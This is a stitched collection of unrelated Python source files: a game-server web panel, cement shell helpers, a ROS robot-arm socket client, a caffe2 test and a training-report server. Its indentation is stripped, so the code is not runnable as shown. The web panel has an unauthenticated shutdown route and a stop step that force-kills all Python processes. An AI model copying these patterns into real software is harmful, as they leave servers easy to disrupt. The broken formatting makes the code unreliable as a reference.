themes_list.append(themes)
return themes_list
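# Map the season selection to the per-item hex length used when splitting a character's inventory string into items.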
def seasons(vars):
if vars == "Season 0-1":
return 20
elif vars == "Season 2-8":
return 32
elif vars == "Season 9-13":
return 64
else:
return 20
def season_reverse(value):
if value == 20:
return "Season 0-1"
elif value == 32:
return "Season 2-8"
elif value == 64:
return "Season 9-13"
else:
return "Season 0-1"
webSettings = [
[sg.Text("Server Name", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get("webConfig", "server_name"))), ],
[sg.Text("Secret Key", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get("webConfig", "secret_key")))],
[sg.Text("Season", size=(10, 1), pad=(0, 5)), sg.DropDown(default_value=season_reverse(config.getint("webConfig", "item_hex_len")),
values=["Season 0-1", "Season 2-8", "Season 9-13"], readonly=True)],
[sg.Text("Web Debug", size=(10, 1), pad=(0, 5)), sg.Checkbox(text="", default=config.getboolean("webConfig", "web_debug"))],
[sg.Text("Web IP", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.get("webConfig", "web_ip")))],
[sg.Text("Web PORT", size=(10, 1), pad=(0, 5)), sg.InputText(default_text=(config.getint("webConfig", "web_port")))],
[sg.Text("Web Theme", size=(10, 1), pad=(0, 5)), sg.DropDown(default_value=config.get("webConfig", "web_theme"),values=listThemes(), readonly=True)],
[sg.Text("Theme Switcher", size=(10, 1), pad=(0, 5)), sg.Checkbox(text="", default=config.getboolean("webConfig", "theme_switcher"))]
]
layout = [[sg.TabGroup([[sg.Tab('SQL Settings', sqlConnect), sg.Tab('WEB Settings', webSettings)]])],
[sg.Button('Start Server', disabled=False,auto_size_button=False),
sg.Button('Stop Server', disabled=True, auto_size_button=False)]
]
window = sg.Window('DTpyWeb GUI v2', icon="static/default-images/favicon.ico",
auto_size_text=False,
default_element_size=(30, 1),
return_keyboard_events=True,
use_default_focus=False,
text_justification="left"
).Layout(layout).Finalize()
def runWeb():
configPath = "config.ini"
config = ConfigParser()
config.read(configPath)
main = Main()
app = Flask(__name__)
app.config['SECRET_KEY'] = config.get("webConfig", "secret_key")
@app.context_processor
def _processor():
return dict(
            date_now=datetime.datetime.now().strftime("%d.%m.%Y %H:%M:%S"),
author="© 2020 r00tme - DTpyWeb. All rights reserved.",
theme=main.themes_check()[0],
theme_switch_form = main.themes_check()[1],
theme_switch_active = config.getboolean("webConfig", "theme_switcher"),
top10=main.rankings(" TOP 10 "),
header="header.html",
server=config.get("webConfig", "server_name"),
)
@app.route('/userinfo', methods=['GET'])
@app.route('/userinfo<path:path>', methods=['GET', 'POST'])
def users_info(path):
main.theme_switcher()
if main.user_exist(path[1:], False):
item_image = []
item_info = []
for i in range(0, 12):
user_items = textwrap.wrap(main.return_items(path[1:]), config.getint("webConfig", "item_hex_len"))[i]
if main.item_info(user_items):
item_image.append(main.item_info(user_items)[1])
item_info.append(main.item_info(user_items)[0])
else:
item_image.append("")
item_info.append("")
return render_template("modules/userinfo.html", title="Character Information Page",
item_info=item_info, item_image=item_image, character=path[1:])
else:
flash(r'This user does not exist', 'error')
return redirect(url_for('home'))
@app.route('/', methods=['GET', 'POST'])
@app.route('/home', methods=['GET', 'POST'])
def home():
# TODO news System
# * This route will be removed after the news system is completed
main.login()
main.theme_switcher()
stripin = main.themes_check()[0].split('/')
return render_template("%s/%s/home.html" % (stripin[0], stripin[1]), title="News")
@app.route('/download', methods=['GET', 'POST'])
@app.route('/about', methods=['GET', 'POST'])
@app.route('/rules', methods=['GET', 'POST'])
@app.route('/rankings', methods=['GET', 'POST'])
def main_pages():
main.login()
main.theme_switcher()
var = config.get("dl_links", "dl_links")
cors = str(var).split("\n")
return render_template("modules/" + request.path + ".html", title=u"%s" % request.path[1:].capitalize(),
download_links=cors)
@app.route('/buy-credits', methods=['GET', 'POST'])
@app.route('/my-auction', methods=['GET', 'POST'])
@app.route('/my-account', methods=['GET', 'POST'])
@app.route('/my-characters', methods=['GET', 'POST'])
@app.route('/vip-modules', methods=['GET', 'POST'])
@app.route('/my-market', methods=['GET', 'POST'])
def user_pages():
main.theme_switcher()
if 'username' not in session:
flash(r'You do not have an access to this page', 'error')
return redirect(url_for('home'))
else:
return render_template("modules/user/" + request.path + ".html",
title=u"%s %s Page" % (request.path.split("-")[0][1:].title(),
request.path.split("-")[1].title()))
@app.route('/logout')
def logout():
session.pop('username', None)
flash('You were logged out', 'info')
return redirect('/home')
@app.route('/register', methods=['GET', 'POST'])
def register():
main.theme_switcher()
form = RegistrationForm()
if form.validate_on_submit():
main.register(
form.username.data,
form.password.data,
form.email.data,
form.question.data,
form.answer.data)
return render_template("modules/register.html", title="Register", form=form)
@app.errorhandler(404)
def page_not_found(e):
return render_template("modules/404.html", title="Page does not exist"), 404
from flask import request
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
@app.route('/shutdown', methods=['POST'])
def shutdown():
shutdown_server()
return 'Server shutting down...'
app.run(debug=False, host=config.get("webConfig", "web_ip"),
port=config.getint("webConfig", "web_port"))
def thegui():
while True:
event, values = window.Read(timeout=0)
if event is None or event == "Exit": # always, always give a way out!
break
        if event != sg.TIMEOUT_KEY:  # compare by value, not identity
config.set("sqlConfig", str("sql_driver"), str(values[0]))
config.set("sqlConfig", str("sql_server"), str(values[1]))
if values[2].isdigit():
config.set("sqlConfig", "sql_port", values[2])
else:
sg.Popup("Type a valid and not in use port number")
window.FindElement(values[2]).Update(values[2][:-1])
config.set("sqlConfig", str("sql_user"), str(values[3]))
config.set("sqlConfig", str("sql_pass"), str(values[4]))
config.set("sqlConfig", str("sql_dbase"), str(values[5]))
config.set("webConfig", str("server_name"), str(values[6]))
config.set("webConfig", str("secret_key"), str(values[7]))
config.set("webConfig", str("item_hex_len"), str(seasons(values[8])))
config.set("webConfig", str("web_debug"), str(values[9]))
if validipv4(values[10]):
config.set("webConfig", str("web_ip"), str(values[10]))
else:
sg.Popup("Type a valid IP address")
window.FindElement(values[10]).Update(values[10][:-1])
if values[11].isdigit():
config.set("webConfig", "web_port", values[11])
else:
sg.Popup("Type a valid and not in use port number")
window.FindElement(values[11]).Update(values[11][:-1])
config.set("webConfig", str("web_theme"), str(values[12]))
config.set("webConfig", str("theme_switcher"), str(values[13]))
with open(configPath, "w+") as f:
config.write(f)
if event == "Start Server":
window.Element('Start Server').Update(disabled=True)
window.Element('Stop Server').Update(disabled=False)
if isPortFree(values[10], int(values[11])):
threading.Thread(target=runWeb).start()
os.startfile("http://" + config.get("webConfig","web_ip") + ":" + config.get("webConfig","web_port"))
else:
sg.Popup("Port %s is already in use, \nchange the port or close the program that use it" % values[10])
if event == "Stop Server":
os.system('taskkill /f /im DTpyWeb.exe')
os.system('taskkill /f /im python.exe')
os.system('start DTpyWeb.exe')
if __name__ == '__main__':
thegui()
|
shell.py
|
"""Common Shell Utilities."""
import os
import sys
from subprocess import Popen, PIPE
from multiprocessing import Process
from threading import Thread
from ..core.meta import MetaMixin
from ..core.exc import FrameworkError
def exec_cmd(cmd_args, *args, **kw):
"""
Execute a shell call using Subprocess. All additional `*args` and
`**kwargs` are passed directly to subprocess.Popen. See `Subprocess
<http://docs.python.org/library/subprocess.html>`_ for more information
on the features of `Popen()`.
:param cmd_args: List of command line arguments.
:type cmd_args: list.
:param args: Additional arguments are passed to Popen().
:param kwargs: Additional keyword arguments are passed to Popen().
:returns: The (stdout, stderror, return_code) of the command.
:rtype: tuple
Usage:
.. code-block:: python
from cement.utils import shell
stdout, stderr, exitcode = shell.exec_cmd(['echo', 'helloworld'])
"""
if 'stdout' not in kw.keys():
kw['stdout'] = PIPE
if 'stderr' not in kw.keys():
kw['stderr'] = PIPE
proc = Popen(cmd_args, *args, **kw)
(stdout, stderr) = proc.communicate()
proc.wait()
return (stdout, stderr, proc.returncode)
def exec_cmd2(cmd_args, *args, **kw):
"""
Similar to exec_cmd, however does not capture stdout, stderr (therefore
allowing it to print to console). All additional `*args` and
`**kwargs` are passed directly to subprocess.Popen. See `Subprocess
<http://docs.python.org/library/subprocess.html>`_ for more information
on the features of `Popen()`.
:param cmd_args: List of command line arguments.
:type cmd_args: list.
:param args: Additional arguments are passed to Popen().
:param kwargs: Additional keyword arguments are passed to Popen().
:returns: The integer return code of the command.
:rtype: int
Usage:
.. code-block:: python
from cement.utils import shell
exitcode = shell.exec_cmd2(['echo', 'helloworld'])
"""
proc = Popen(cmd_args, *args, **kw)
proc.wait()
return proc.returncode
def spawn_process(target, start=True, join=False, *args, **kwargs):
"""
A quick wrapper around multiprocessing.Process(). By default the start()
function will be called before the spawned process object is returned.
See `MultiProcessing
<https://docs.python.org/2/library/multiprocessing.html>`_ for more
information on the features of `Process()`.
:param target: The target function to execute in the sub-process.
:param start: Call start() on the process before returning the process
object.
:param join: Call join() on the process before returning the process
object. Only called if start=True.
:param args: Additional arguments are passed to Process().
:param kwargs: Additional keyword arguments are passed to Process().
:returns: The process object returned by Process().
Usage:
.. code-block:: python
from cement.utils import shell
def add(a, b):
print(a + b)
p = shell.spawn_process(add, args=(12, 27))
p.join()
"""
proc = Process(target=target, *args, **kwargs)
if start and not join:
proc.start()
elif start and join:
proc.start()
proc.join()
return proc
def spawn_thread(target, start=True, join=False, *args, **kwargs):
"""
A quick wrapper around threading.Thread(). By default the start()
    function will be called before the spawned thread object is returned.
See `Threading
<https://docs.python.org/2/library/threading.html>`_ for more
information on the features of `Thread()`.
:param target: The target function to execute in the thread.
:param start: Call start() on the thread before returning the thread
object.
:param join: Call join() on the thread before returning the thread
object. Only called if start=True.
:param args: Additional arguments are passed to Thread().
:param kwargs: Additional keyword arguments are passed to Thread().
:returns: The thread object returned by Thread().
Usage:
.. code-block:: python
from cement.utils import shell
def add(a, b):
print(a + b)
t = shell.spawn_thread(add, args=(12, 27))
t.join()
"""
thr = Thread(target=target, *args, **kwargs)
if start and not join:
thr.start()
elif start and join:
thr.start()
thr.join()
return thr
class Prompt(MetaMixin):
"""
A wrapper around `raw_input` or `input` (py3) whose purpose is to limit
    the redundant task of gathering user input. Can be used in several ways
depending on the use case (simple input, options, and numbered
selection).
:param text: The text displayed at the input prompt.
Usage:
Simple prompt to halt operations and wait for user to hit enter:
.. code-block:: python
p = shell.Prompt("Press Enter To Continue", default='ENTER')
.. code-block:: text
$ python myapp.py
Press Enter To Continue
$
Provide a numbered list for longer selections:
.. code-block:: python
p = Prompt("Where do you live?",
options=[
'San Antonio, TX',
'Austin, TX',
'Dallas, TX',
'Houston, TX',
],
numbered = True,
)
.. code-block:: text
Where do you live?
1: San Antonio, TX
2: Austin, TX
3: Dallas, TX
4: Houston, TX
Enter the number for your selection:
Create a more complex prompt, and process the input from the user:
.. code-block:: python
class MyPrompt(Prompt):
class Meta:
text = "Do you agree to the terms?"
options = ['Yes', 'no', 'maybe-so']
options_separator = '|'
default = 'no'
clear = True
max_attempts = 99
def process_input(self):
if self.input.lower() == 'yes':
# do something crazy
pass
else:
# don't do anything... maybe exit?
print("User doesn't agree! I'm outa here")
sys.exit(1)
MyPrompt()
.. code-block:: text
$ python myapp.py
[TERMINAL CLEAR]
Do you agree to the terms? [Yes|no|maybe-so] no
User doesn't agree! I'm outa here
$ echo $?
$ 1
"""
class Meta:
"""
Optional meta-data (can also be passed as keyword arguments to the
parent class).
"""
# The text that is displayed to prompt the user
text = "Tell me someting interesting:"
#: A default value to use if the user doesn't provide any input
default = None
#: Options to provide to the user. If set, the input must match one
#: of the items in the options selection.
options = None
#: Separator to use within the option selection (non-numbered)
options_separator = ','
#: Display options in a numbered list, where the user can enter a
#: number. Useful for long selections.
numbered = False
#: The text to display along with the numbered selection for user
#: input.
selection_text = "Enter the number for your selection:"
#: Whether or not to automatically prompt() the user once the class
#: is instantiated.
auto = True
#: Whether to treat user input as case insensitive (only used to
#: compare user input with available options).
case_insensitive = True
#: Whether or not to clear the terminal when prompting the user.
clear = False
#: Command to issue when clearing the terminal.
clear_command = 'clear'
#: Max attempts to get proper input from the user before giving up.
max_attempts = 10
#: Raise an exception when max_attempts is hit? If not, Prompt
#: passes the input through as `None`.
max_attempts_exception = True
def __init__(self, text=None, *args, **kw):
if text is not None:
kw['text'] = text
super(Prompt, self).__init__(*args, **kw)
self.input = None
if self._meta.auto:
self.prompt()
def _prompt(self):
if self._meta.clear:
os.system(self._meta.clear_command)
text = ""
if self._meta.options is not None:
if self._meta.numbered is True:
text = text + self._meta.text + "\n\n"
count = 1
for option in self._meta.options:
text = text + "%s: %s\n" % (count, option)
count += 1
text = text + "\n"
text = text + self._meta.selection_text
else:
sep = self._meta.options_separator
text = "%s [%s]" % (self._meta.text,
sep.join(self._meta.options))
else:
text = self._meta.text
if sys.version_info[0] < 3: # pragma: nocover
self.input = raw_input("%s " % text) # pragma: nocover
else: # pragma: nocover
self.input = input("%s " % text) # pragma: nocover
if self.input == '' and self._meta.default is not None:
self.input = self._meta.default
elif self.input == '':
self.input = None
def prompt(self):
"""
Prompt the user, and store their input as `self.input`.
"""
attempt = 0
while self.input is None:
if attempt >= int(self._meta.max_attempts):
if self._meta.max_attempts_exception is True:
raise FrameworkError("Maximum attempts exceeded getting "
"valid user input")
else:
return self.input
attempt += 1
self._prompt()
if self.input is None:
continue
elif self._meta.options is not None:
if self._meta.numbered:
try:
self.input = self._meta.options[int(self.input) - 1]
except (IndexError, ValueError) as e:
self.input = None
continue
else:
if self._meta.case_insensitive is True:
lower_options = [x.lower()
for x in self._meta.options]
if not self.input.lower() in lower_options:
self.input = None
continue
else:
if self.input not in self._meta.options:
self.input = None
continue
self.process_input()
return self.input
def process_input(self):
"""
Does not do anything. Is intended to be used in a sub-class to handle
user input after it is prompted.
"""
pass
|
RobotArm5_socket_ros_20190521164009.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them over a socket to the control-side computer
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import RobotArm5_socket_TCPcmd as TCP
import RobotArm5_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0'  # initial value of the data to be transmitted
Arm_feedback = 1  # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0  # initial value of the response counter
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # end the generator (raising StopIteration here becomes RuntimeError under PEP 479, Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##---------- socket packet transmission --------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.0.1', 8080))#iclab 5
s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
    start_input = int(input('Press 1 to start transmission, 3 to exit: '))
#start_input = 1
if start_input==1:
while 1:
            ##--------------- send arm commands over the socket -----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
socket_cmd.action= 5
            s.send(data.encode('utf-8'))  # encode the command string and send it over the socket
feedback_str = s.recv(1024)
            # the arm side reports its current state
###test 0403
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Hiwin test 20190521
# feedback = 0
# socket_client_arm_state(feedback)
#Hiwin test 20190521
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
            ##--------------- send arm commands over the socket end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent/outdent line
|
context_test.py
|
from caffe2.python import context, test_util
from threading import Thread
class MyContext(context.Managed):
pass
class DefaultMyContext(context.DefaultManaged):
pass
class ChildMyContext(MyContext):
pass
class TestContext(test_util.TestCase):
def use_my_context(self):
try:
for _ in range(100):
with MyContext() as a:
for _ in range(100):
self.assertTrue(MyContext.current() == a)
except Exception as e:
self._exceptions.append(e)
def testMultiThreaded(self):
threads = []
self._exceptions = []
for _ in range(8):
thread = Thread(target=self.use_my_context)
thread.start()
threads.append(thread)
for t in threads:
t.join()
for e in self._exceptions:
raise e
@MyContext()
def testDecorator(self):
self.assertIsNotNone(MyContext.current())
def testNonDefaultCurrent(self):
with self.assertRaises(AssertionError):
MyContext.current()
ctx = MyContext()
self.assertEqual(MyContext.current(value=ctx), ctx)
self.assertIsNone(MyContext.current(required=False))
def testDefaultCurrent(self):
self.assertIsInstance(DefaultMyContext.current(), DefaultMyContext)
def testNestedContexts(self):
with MyContext() as ctx1:
with DefaultMyContext() as ctx2:
self.assertEqual(DefaultMyContext.current(), ctx2)
self.assertEqual(MyContext.current(), ctx1)
def testChildClasses(self):
with ChildMyContext() as ctx:
self.assertEqual(ChildMyContext.current(), ctx)
self.assertEqual(MyContext.current(), ctx)
|
server.py
|
# -*- coding: utf-8 -*-
import contextlib
import copy
import hashlib
import json
import logging
import os
import re
import sys
import threading
import time
from logging import getLogger
from stat import S_ISDIR
from subprocess import CalledProcessError
import six
from flask import Blueprint, Flask, render_template, current_app, request
from flask.helpers import safe_join
from gevent.pywsgi import WSGIServer
from pygments import highlight
from pygments.formatters.html import HtmlFormatter
from pygments.lexers import get_lexer_by_name
from werkzeug.exceptions import NotFound, BadRequest
from madoka.utils import TrainStorage
from .snapshot import (TrainStorageSnapshot, TrainStorageSnapshotDiff,
TrainStorageScanner)
__all__ = ['MadokaBoardServer']
class _SnapshotCollector(object):
"""Background thread to collect training storage snapshots.
Parameters
----------
storage_root : dict[str, str]
Path of the training storage, or mappings from URL prefix to
paths of training storage.
scan_interval : int
Number of seconds between two successive scans of training storage.
"""
def __init__(self, storage_root, scan_interval):
self.storage_root = storage_root
self.scan_interval = scan_interval
self.scanners = {
k: TrainStorageScanner(v)
for k, v in six.iteritems(storage_root)
}
self.snapshot = None # type: TrainStorageSnapshot
# the background watcher
self._watching = False
self._watcher = None # type: threading.Thread
self._start_sem = None # type: threading.Semaphore
self._sleep_sem = None # type: threading.Semaphore
# initialize the snapshot for the first time
self.collect()
def collect(self):
"""Collect the snapshot and difference.
Returns
-------
TrainStorageSnapshotDiff
The difference between old and new snapshots.
"""
storage_dirs = []
for prefix, scanner in six.iteritems(self.scanners):
for s in scanner.scan():
s = copy.copy(s)
s.path = prefix + '/' + s.path
storage_dirs.append(s)
snapshot = TrainStorageSnapshot(storage_dirs)
if self.snapshot is not None:
snapshot_diff = snapshot.compute_diff(self.snapshot)
else:
snapshot_diff = None
self.snapshot = snapshot
return snapshot_diff
def wakeup_watcher(self):
"""Wake up the background thread immediately."""
if self._watching:
self._sleep_sem.release()
def start_watcher(self):
"""Start the background thread to watch training storage."""
def watch():
self._start_sem.release()
while self._watching:
try:
start_time = time.time()
diff = self.collect()
stop_time = time.time()
seconds = stop_time - start_time
getLogger(__name__).info(
'Collected snapshot in %.2f seconds, %s update(s).',
seconds, len(diff)
)
if getLogger(__name__).isEnabledFor(logging.DEBUG):
getLogger(__name__).debug('%s', diff)
except Exception:
getLogger(__name__).warning(
'Failed to collect snapshot.', exc_info=1)
self._sleep_sem.acquire(timeout=self.scan_interval)
self._watching = True
self._start_sem = threading.Semaphore(0)
self._sleep_sem = threading.Semaphore(0)
self._watcher = threading.Thread(target=watch, daemon=True)
self._watcher.start()
# wait for the thread to actually startup.
self._start_sem.acquire()
def stop_watcher(self):
"""Stop the background watcher."""
if self._watching:
self._watching = False
self._sleep_sem.release()
def json_response(method):
"""Decorator to make json response."""
@six.wraps(method)
def inner(*args, **kwargs):
return (
json.dumps(method(*args, **kwargs)),
200,
{'Content-Type': 'application/json'}
)
return inner
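# Illustrative sketch of how the decorator above is meant to be used: the wrapped
# view returns a plain Python object, and json_response serializes it and sets
# the content type (the view name below is hypothetical).
#
#   @json_response
#   def my_view():
#       return {'status': 'ok'}
#
#   my_view()  ->  ('{"status": "ok"}', 200, {'Content-Type': 'application/json'})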
_STORAGE_META_FILES = [
TrainStorage._LATEST_FN, TrainStorage._MKDIR_LOCK_FN,
TrainStorage._VERSION_FN, TrainStorage._VERSION_LOCK_FN,
]
def _chown_to_parent(parent, check_list=None, ignore_errors=False):
"""
Set the owner of all storage directories and tags to that of the
parent directory.
Parameters
----------
parent : str
The parent directory of storage and tags.
check_list : collections.Iterable[str]
If specified, will only check these entries under the parent.
If not, will check all entries recursively.
ignore_errors : bool
Whether or not to ignore errors of chown?
"""
p_st = os.stat(parent)
# function to check whether or not a given path should be chown
def should_chown(file, st=None):
if st is None:
st = os.stat(file)
if st.st_uid != p_st.st_uid or st.st_gid != p_st.st_gid:
return True
# gather the entity list which should be chown
if check_list is None:
def gather_list(path, dst):
for f in os.listdir(path):
f_path = os.path.join(path, f)
f_st = os.stat(f_path)
if should_chown(f_path, f_st):
dst.append(f_path)
if S_ISDIR(f_st.st_mode):
gather_list(f_path, dst)
return dst
else:
def gather_list(path, dst):
for f in check_list:
f_path = os.path.join(path, f)
if should_chown(f_path):
dst.append(f_path)
return dst
try:
file_list = gather_list(parent, [])
# chown the entities
for file in file_list:
try:
os.chown(file, p_st.st_uid, p_st.st_gid)
except Exception:
if not ignore_errors:
raise
getLogger(__name__).warning(
'Failed to change owner of %r to %s:%s.',
file, p_st.st_uid, p_st.st_gid, exc_info=1
)
except Exception:
if not ignore_errors:
raise
getLogger(__name__).warning(
'Failed to gather entities under %r.', parent, exc_info=1)
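# Illustrative call (the path is a placeholder): align ownership of everything
# under a storage root with the owner of the root itself, ignoring chown failures.
#   _chown_to_parent('/data/train_storage', ignore_errors=True)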
def _make_report(parent, name, exp_id, fix_permissions=False):
# actually generate the report.
with TrainStorage.open(
parent, name, require_checkpoints=False) as store:
report = store.load_report()
store.save_report(report, exp_id=exp_id)
# fix the permissions
if fix_permissions:
report_dir = TrainStorage._REPORT_DIR
_chown_to_parent(
parent,
_STORAGE_META_FILES + [report_dir],
ignore_errors=True
)
_chown_to_parent(
os.path.join(parent, name, report_dir),
ignore_errors=True
)
class _StorageBlueprint(Blueprint):
"""Flask blueprint to serve training reports under specified root.
Parameters
----------
name : str
Name of this blue print.
root_path : str
Root path of the training storage.
"""
def __init__(self, name, root_path, url_prefix):
super(_StorageBlueprint, self).__init__(
name, __name__, url_prefix=url_prefix
)
self.root_path = os.path.realpath(root_path)
# add url routes
self.add_url_rule('/<path:path>/_navigation.html',
view_func=self.navigation)
self.add_url_rule('/<path:path>/_main.py',
view_func=self.main_script)
self.add_url_rule('/<path:path>/_api',
view_func=self.storage_api,
methods=['POST'])
# auto index generator
from flask_autoindex import AutoIndexBlueprint
self._index_generator = AutoIndexBlueprint(
self,
browse_root=self.root_path
)
def get_storage_root(self, path):
"""Get storage root for given virtual path.
Parameters
----------
path : str
The virtual path of the storage, relative to `self.root_path`.
Returns
-------
str
The file system path of the storage.
Raises
------
NotFound
If the specified storage does not exist.
"""
# get the storage root path
path = [p for p in re.sub(r'(/|\\)+', '/', path).split('/')
if p not in ('', '.', '..')]
root = os.path.join(self.root_path, *path)
# check whether or not it looks like a storage root directory
if not os.path.isdir(root):
raise NotFound()
summary_dir = os.path.join(root, TrainStorage._SUMMARY_DIR)
report_dir = os.path.join(root, TrainStorage._REPORT_DIR)
logging_file = os.path.join(root, TrainStorage._LOGGING_FN)
candidates = (summary_dir, report_dir, logging_file)
if not any(os.path.exists(p) for p in candidates):
raise NotFound()
return root
def navigation(self, path):
self.get_storage_root(path) # ensure the storage exists
exp_id = path.rsplit('/', 1)[-1]
return render_template('navigation.html', exp_id=exp_id)
def main_script(self, path):
# ensure the storage exists
root = self.get_storage_root(path)
# read the main script
script_file = os.path.join(root, 'main.py')
if not os.path.exists(script_file):
raise NotFound()
with open(script_file, 'rb') as f:
code = f.read()
# highlight the code by pygments
lexer = get_lexer_by_name("python", stripall=True)
formatter = HtmlFormatter(linenos=True, cssclass="codehilite")
source = highlight(code, lexer, formatter)
return render_template(
'highlight.html', source=source, filename='main.py')
def _storage_delete(self, path, parent, name):
try:
TrainStorage.delete(parent, name)
if current_app.server.chown_to_parent:
_chown_to_parent(
parent, _STORAGE_META_FILES, ignore_errors=True)
current_app.server.collector.wakeup_watcher()
return {'error': 0, 'message': ''}
except Exception:
msg = 'Failed to delete storage %r.' % path
getLogger(__name__).warning(msg, exc_info=1)
return {'error': 1, 'message': msg}
def _storage_change_tags(self, path, parent, name, tags, op):
try:
if op == 'remove_tags':
TrainStorage.remove_tags(parent, name, tags)
elif op == 'add_tags':
TrainStorage.add_tags(parent, name, tags)
if current_app.server.chown_to_parent:
_chown_to_parent(
parent, _STORAGE_META_FILES + tags, ignore_errors=True)
current_app.server.collector.wakeup_watcher()
return {'error': 0, 'message': ''}
except ValueError as ex:
msg = str(ex)
return {'error': 1, 'message': msg}
except Exception:
msg = 'Failed to %s tags %r for storage %r.' % (op, tags, path)
getLogger(__name__).warning(msg, exc_info=1)
return {'error': 1, 'message': msg}
def _storage_make_report(self, path, parent, name):
fix_permissions = current_app.server.chown_to_parent
if self.url_prefix.endswith('/'):
exp_id = self.url_prefix + path
else:
exp_id = self.url_prefix + '/' + path
# spawn the python process to make the report
import gevent.subprocess
try:
env = copy.copy(os.environ)
env['PYTHONPATH'] = '%s:%s' % (
os.path.abspath(
os.path.join(
os.path.dirname(__file__),
'../..'
)
),
env.get('PYTHONPATH', '')
)
_ = gevent.subprocess.check_output(
[
sys.executable,
'-c',
